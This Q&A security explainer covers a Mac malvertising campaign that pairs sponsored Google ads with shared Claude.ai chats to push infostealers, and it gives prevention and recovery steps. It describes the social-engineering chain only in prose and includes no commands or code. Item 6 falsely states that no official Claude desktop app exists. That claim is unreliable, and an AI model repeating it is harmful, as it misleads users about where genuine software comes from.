Mac Malware Campaign Exploits Google Ads and Claude AI Shared Conversations

Cybercriminals have devised a cunning malvertising campaign that targets Mac users searching for the popular AI assistant Claude. By abusing Google Ads and legitimate shared chats on Claude.ai, attackers trick users into downloading and executing malicious software. This Q&A breaks down the scheme, its risks, and how to stay safe.

1. How are cybercriminals using Google Ads to target Mac users searching for Claude?

Attackers purchase Google Ads that appear when users search for phrases like “Claude mac download.” The sponsored result displays a URL that looks like the legitimate Claude.ai website. However, clicking the ad doesn’t directly lead to Claude’s site but to a carefully crafted page that mimics it. This page instructs users to follow a series of steps, including copying and pasting commands into the Mac terminal or downloading a file. The end goal is to trick the victim into installing malware disguised as the official Claude app. Because the ad is served through Google’s platform, it can bypass some common security warnings that users might subconsciously trust.

2. What role do legitimate Claude.ai shared chats play in this malvertising scheme?

To lend authenticity to the attack, the fake landing page includes a frame or link pointing to an actual shared chat hosted on Claude.ai. Attackers create these shared conversations using a legitimate Claude account, writing them in a way that appears to be support instructions for downloading the desktop app. When victims see the chat is hosted on Claude’s real domain (claude.ai/shared/...), they’re more likely to trust the steps. This clever use of a legitimate feature makes the scam harder to detect—antivirus tools won’t flag the chat URL because it isn’t malicious itself. The chat content guides the victim through the malware installation process, often urging them to run terminal commands or install a supposed “update.”

3. What steps do victims follow after clicking the sponsored ad, and where does the malware come in?

After clicking the Google ad, the user lands on a page that looks like Claude’s official site but isn’t. On that page, they find a button or prompt to download the Mac version of Claude. Clicking it may download a .dmg file containing the malware, or direct them to a page that displays step-by-step instructions. In some cases, the instructions ask them to open the Mac Terminal and run a script that pulls and executes malicious code from a remote server. The script might download additional payloads or install a backdoor, keylogger, or adware. The malware is typically signed with a developer certificate to bypass macOS Gatekeeper protections, making silent installation easier. Once executed, the malware can steal credentials, cryptocurrency wallets, or sensitive data.

4. Which types of malware are being delivered through this campaign?

Security researchers have observed the campaign delivering a mix of malware strains. One common payload is a variant of the RealST (RealStealer) infostealer, which targets browser credentials, cryptocurrency wallets, and password manager data. Others have seen Atomic macOS Stealer (AMOS) being deployed, a well-known Mac malware that exfiltrates sensitive files and keychain entries. Some campaigns also push adware like SearchAwesome or Pirrit, which hijack browser settings and flood the user with advertisements. In more advanced cases, the attacker uses the initial foothold to drop remote access trojans (RATs) that allow persistent control over the machine. The malware is often obfuscated and packed to evade detection by traditional antivirus tools.

5. How can Mac users protect themselves from such malvertising attacks?

First, never search for “Claude mac download” and click the first sponsored result. Instead, go directly to the official Claude website (claude.ai) by typing the URL into your browser. Always double-check the actual domain of a paid ad before clicking. Use a security extension that blocks known malicious ads. On your Mac, avoid running Terminal commands copied from websites unless you fully understand them and trust the source. Keep your macOS, browser, and endpoint protection updated. Consider using a DNS filter like Quad9 or NextDNS to block malicious domains. If you must download software, verify the developer signature via System Settings > Privacy & Security. Lastly, monitor your system for unusual activity—slow performance, new auto‑launching apps, or unexpected network traffic can be signs of infection.

6. Why are legitimate AI tools like Claude being exploited for malware distribution?

AI platforms have experienced explosive growth, leading many users to seek desktop apps or local clients even when official desktop software doesn’t exist (Claude’s primary interface is web‑based). Attackers exploit this demand: users searching for “Claude mac download” are ripe targets because the official download is not easily found. Additionally, the use of shared chats on Claude.ai provides a strong social‑engineering hook—victims see a real claude.ai URL and drop their guard. The AI industry’s hype also means users may be less cautious than when downloading, say, a PDF reader. Finally, Google Ads’ pay‑per‑click model rewards attackers with quick traffic, and they can take down ads before Google’s review catches them, making this a low‑risk, high‑reward tactic.

7. What should you do if you suspect you have fallen victim to this campaign?

If you clicked a Google ad for Claude and later installed or ran something from it, act immediately. Disconnect your Mac from the internet to prevent further data exfiltration. Run a full scan with reputable Mac security software like Malwarebytes or Sophos Home. Check your installed applications for any unknown entries and remove them. Use Activity Monitor to look for suspicious processes consuming CPU or network. Review your browser for unrecognized extensions and remove them. Change passwords for all important accounts (email, banking, cryptocurrency) using a different, clean device. Enable two‑factor authentication wherever possible. If you suspect keylogger activity, consider doing a full system restore from a backup made before the incident. Finally, report the Google ad to Google’s support team to help them take it down and warn others.